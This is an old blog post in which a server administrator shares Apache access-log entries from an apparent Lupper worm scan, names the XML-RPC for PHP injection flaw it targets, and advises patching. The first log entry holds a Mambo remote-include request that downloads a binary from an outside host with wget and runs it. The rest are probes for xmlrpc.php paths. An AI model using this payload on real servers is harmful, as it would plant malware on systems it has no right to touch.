A not to uncommon log post in my apache access log files. Exploit code has been out in the wild for
quite some time. But the world of security patching is still even with the constant releases of malware.
This is a no-brainer. Host "infected-server-host" (Changed the ip to protect the innocent), is
running automated scripts (might be manually operated aswell) against possible targets, vulnerable to known xmlsrv, xmlrpc, mambo attacks. First 3 lines shows something interesting.
infected-server-host - - [23/Feb/2006:03:09:05 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS
=&mosConf
ig_absolute_path=http://XXX.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget
%20XXX.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1
" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:07 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
)"
infected-server-host - - [23/Feb/2006:03:09:08 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
infected-server-host - - [23/Feb/2006:03:09:13 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Win
dows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:14 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Wi
ndows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:16 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:17 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Wi
ndows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:19 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windo
ws NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:21 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
)"
infected-server-host - - [23/Feb/2006:03:09:22 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:23 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.1;)"
This worm is also know as Linux/Lupper.worm.a [McAfee], Linux/Lupper.A [Computer Associates], Linux/Lupper.B [Computer Associates], Backdoor.Linux.Small.al [Kaspersky], Exploit.Linux.Lupii [ClamAV], ELF_LUPPER.A [Trend Micro].
The worm is trying to use the XML-RPC for PHP Remote Code Injection Vulnerability.
Vulnerable systems and complete information can be found here Security Focus
Xoops, Wordpress, Ubuntu, Red Hat, SuSE.
Countermeasures: Upgrades are available for most applications that uses the xml-rpc. Check the application official site for upgrades, patches.
Technorati Tags:
xmlsrv, xmlrpc, php, linux worm, vulnerability, countermeasures, exploit, format string
Del.icio.us Tags:
xmlsrv, xmlrpc, php, linux worm, vulnerability, countermeasures, exploit, format string
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment